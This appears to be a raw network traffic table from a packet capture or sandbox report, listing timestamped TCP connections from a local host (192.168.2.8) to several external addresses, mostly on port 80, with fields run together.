                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.798772097 CET4976380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.798916101 CET4976380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.798916101 CET4976380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.799077034 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.804163933 CET804976334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.804173946 CET804976334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.524547100 CET804976218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.524697065 CET4976280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.530066013 CET804976218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.530123949 CET4976280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.626146078 CET4976480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.630702019 CET804976334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.630899906 CET4976380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.631242990 CET8049764172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.631326914 CET4976480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.631436110 CET4976480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.631448030 CET4976480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.637381077 CET8049764172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.637392044 CET8049764172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.638120890 CET804976334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.638170004 CET4976380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.656611919 CET4976580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.661499023 CET804976554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.661559105 CET4976580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.661675930 CET4976580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.661700964 CET4976580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.666496992 CET804976554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.666507006 CET804976554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.332942009 CET8049764172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.333009958 CET4976480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.333044052 CET4976480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.337932110 CET8049764172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.352279902 CET4976680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.357314110 CET8049766172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.357388020 CET4976680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.357513905 CET4976680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.357542038 CET4976680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.362293959 CET8049766172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.362318993 CET8049766172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.499507904 CET804976554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.500370026 CET4976580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.505577087 CET804976554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.506561995 CET4976580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.534281015 CET4976780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.539249897 CET804976718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.539318085 CET4976780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.539400101 CET4976780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.539422989 CET4976780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.544310093 CET804976718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.544322014 CET804976718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.030823946 CET8049766172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.030910969 CET4976680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.030991077 CET4976680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.033572912 CET4976780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.036067009 CET8049766172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.068548918 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.073673964 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.073745966 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.073998928 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.074021101 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.079001904 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.079022884 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.346950054 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352149010 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352227926 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352500916 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352538109 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.357311010 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.357692003 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.313596010 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.315691948 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.320846081 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.320899963 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.475723028 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481122017 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481234074 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481409073 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481442928 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.486505032 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.486517906 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.502891064 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.503063917 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.508106947 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.508172989 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.523547888 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528377056 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528443098 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528558969 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528584957 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.533406019 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.533421993 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.736927986 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.741785049 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.007426023 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.009007931 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.013984919 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.148029089 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.148178101 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.153336048 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.153390884 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.217323065 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.217684984 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.222986937 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.223038912 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.275357962 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.280163050 CET804977244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.281033039 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.281198978 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.281239033 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.285934925 CET804977244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.285957098 CET804977244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.324094057 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.329068899 CET8049773208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.329683065 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.329936981 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.329952002 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.334790945 CET8049773208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.334801912 CET8049773208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.944010019 CET804977244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.944161892 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.949387074 CET804977244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.949450016 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.965711117 CET8049773208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.000356913 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.000401020 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.000571966 CET4977480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.005508900 CET8049773208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.005520105 CET8049773208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.005532026 CET804977418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.005592108 CET4977480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.005709887 CET4977480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.005726099 CET4977480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.012243032 CET804977418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.012435913 CET804977418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.146083117 CET8049773208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.189706087 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.211554050 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.252188921 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.441349030 CET4977580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.446269035 CET804977513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.446346045 CET4977580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.456578970 CET4977580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.456615925 CET4977580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.461504936 CET804977513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.461514950 CET804977513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.070116997 CET4977480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.084300995 CET4977780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.089294910 CET804977718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.089448929 CET4977780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.093044043 CET4977780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.093061924 CET4977780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.097871065 CET804977718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.097886086 CET804977718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.862967968 CET804977513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.863293886 CET4977580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.868412971 CET804977513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.868504047 CET4977580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.071609974 CET4977880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.076555014 CET804977844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.077629089 CET4977880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.077753067 CET4977880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.077768087 CET4977880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.082686901 CET804977844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.082699060 CET804977844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.560075998 CET804977718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.560220957 CET4977780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.566123962 CET804977718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.566307068 CET4977780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.609082937 CET4977980192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.614001989 CET804977918.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.614105940 CET4977980192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.614274979 CET4977980192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.614293098 CET4977980192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.619293928 CET804977918.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.619298935 CET804977918.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.732904911 CET804977844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.733055115 CET4977880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.738250017 CET804977844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.738316059 CET4977880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.080750942 CET4978080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.085673094 CET804978054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.085748911 CET4978080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.085887909 CET4978080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.085908890 CET4978080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.090876102 CET804978054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.090923071 CET804978054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.525759935 CET804977918.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.526124954 CET4977980192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.550781012 CET804977918.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.551163912 CET4977980192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.830800056 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.835571051 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.837600946 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.840864897 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.840883017 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.845818996 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.845830917 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.917217016 CET804978054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.919059992 CET4978080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.924623013 CET804978054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.924680948 CET4978080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.286418915 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291404963 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291465044 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291610003 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291623116 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.296473980 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.296485901 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.499131918 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.499284029 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.504522085 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.504580021 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.533659935 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538387060 CET804978313.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538456917 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538604021 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538624048 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.543414116 CET804978313.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.543425083 CET804978313.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.042154074 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.118083954 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.123003960 CET804978413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.123091936 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.129843950 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.136745930 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.136853933 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.141726017 CET804978413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.141737938 CET804978413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.148832083 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.154167891 CET804978235.164.78.200192.168.2.8
